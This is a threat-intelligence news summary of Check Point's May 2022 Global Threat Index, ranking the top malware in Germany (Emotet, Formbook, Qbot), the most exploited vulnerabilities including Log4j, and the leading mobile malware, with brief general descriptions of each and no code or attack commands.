Top Malware of May 2022
Meanwhile, Emotet remains undisputed at the top of the Check Point Research table in May 2022. Behind them are Formbook and Qbot.
Check Point has published the Global Threat Index for May 2022.
Emotet remains at the top and hit 8.16 percent of all German companies and authorities recorded by Check Point – a tiny decline compared to April. Formbook is in second place as an infostealer, Qbot is in third place as a banking Trojan.
Maya Horowitz, Director of Threat Intelligence and Research and Products at Check Point
On the other hand, the Snake keylogger attracts attention worldwide. For this reason, warns Maya Horowitz, VP Research at Check Point :
“As the recent Snake keylogger campaigns show, users are exposed to the risk of a cyber attack in everything they do on the Internet. Viruses and malicious executable code can lurk in multimedia content and links, with the malware, in this case the Snake keylogger, ready to attack as soon as a user opens the malicious PDF file. Just as users would question the legitimacy of a docx or xlsx email attachment, they must therefore exercise the same caution with PDFs. It has never been more important for companies to have a robust email security solution that quarantines and checks attachments to prevent malicious files from entering the network in the first place.“
Top 3 Most Wanted Malware for Germany:
The arrows refer to the change in placement from the previous month.
Emotet is still in first place. Formbook takes second place and Qbot takes third place.
- ↔ Emotet – Emotet is an advanced, self-propagating and modular Trojan. It was previously used as a banking Trojan, but currently serves as a propagator of other malicious programs or entire campaigns. He uses various methods to stay operational and knows evasive techniques to avoid detection. In addition, it can be spread through phishing emails that contain malicious attachments or links.
- ↑ Formbook – FormBook is an infostealer that targets the Windows operating system and was first discovered in 2016. It is marketed in hacking forums as malware-as-a-Service (MaaS) because it knows strong evasion techniques and costs a fairly low price. FormBook collects and steals credentials from various web browsers, takes screenshots, monitors and logs keystrokes, and can download and run files from its C&C on instruction.
- ↑ Qbot – Qbot, also known as Qakbot, is a banking Trojan that first appeared in 2008. Qbot is often distributed via spam emails and uses various anti-VM, anti-debugging and anti-sandbox techniques to complicate analysis and bypass detection.
The Top 3 Most Wanted Vulnerabilities:
This month, the most exploited vulnerability is Web Server’s Malicious URL Directory Traversal, which affects 46 percent of companies worldwide, followed by Apache Log4j Remote Code Execution (CVE-2021-44228), which also affects 46 percent of companies worldwide. Web Server Exposed Git Repository Information Disclosure slips to third place with a worldwide impact of 45 percent.
- ↑ Web Servers Malicious URL Directory Traversal (CVE-2010-4598, CVE-2011-2474, CVE-2014-0130, CVE-2014-0780, CVE-2015-0666, CVE-2015-4068, CVE-2015-7254, CVE-2016-4523, CVE-2016 -8530, CVE-2017-11512, CVE-2018-3948, CVE-2018-3949, CVE-2019-18952, CVE-2020-5410, CVE-2020-8260) – There is a vulnerability in the pathfinding of directories on various web servers. The vulnerability is due to an input validation error in a web server that does not properly clean the URL for the pathfinding patterns. Successful exploitation allows attackers to expose or access any files on the vulnerable server.
- ↔ Apache Log4j Remote Code Execution (CVE-2021-44228) – There is a vulnerability in Apache Log4j that allows an attacker to execute malicious code at will.
- ↓ Web Server Exposed Git Repository Information Disclosure – A vulnerability has been reported in Git Repository that exposes information. The successful exploitation of this vulnerability could allow unintentional disclosure of account information.
The Top 3 Most Wanted Mobile Malware:
This month nothing changes: AlienBot the most common mobile malware. FluBot and xHelper follow.
- ↔ AlienBot – The AlienBot malware family is a malware-as-a-Service (MaaS) for Android devices that allows an attacker to smuggle criminal code into legitimate financial applications as a first step. The attacker gains access to the victims’ accounts and eventually takes complete control of their device.
- ↔ FluBot – FluBot is an Android malware that is spread via phishing SMS messages (smishing), which usually pretend to be logistics suppliers. As soon as the user clicks on the link in the message, he will be redirected to the download of a fake application containing FluBot. After installation, the malware has various functions for collecting login data and supporting the smishing operation itself, including uploading contact lists and sending SMS messages to other phone numbers.
- ↔ xHelper – A mobile malware that has been occurring since March 2019 and is used to download other contaminated apps and display advertisements. The application is able to hide from the user and can even reinstall itself if it has been uninstalled.
Top 3 of the attacked industries and areas in Germany:
- ↑ Education/Research.
- ↓ Software Vendor (Software provider).
- ↔ ISP/MSP.
Check Point’s Global Threat Impact Index and its ThreatCloud Map are based on Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat data collected by hundreds of millions of sensors worldwide across networks, endpoints and mobile phones. This database is enriched by AI-based engines and exclusive research data from Check Point Research, the Intelligence & Research department of Check Point Software Technologies.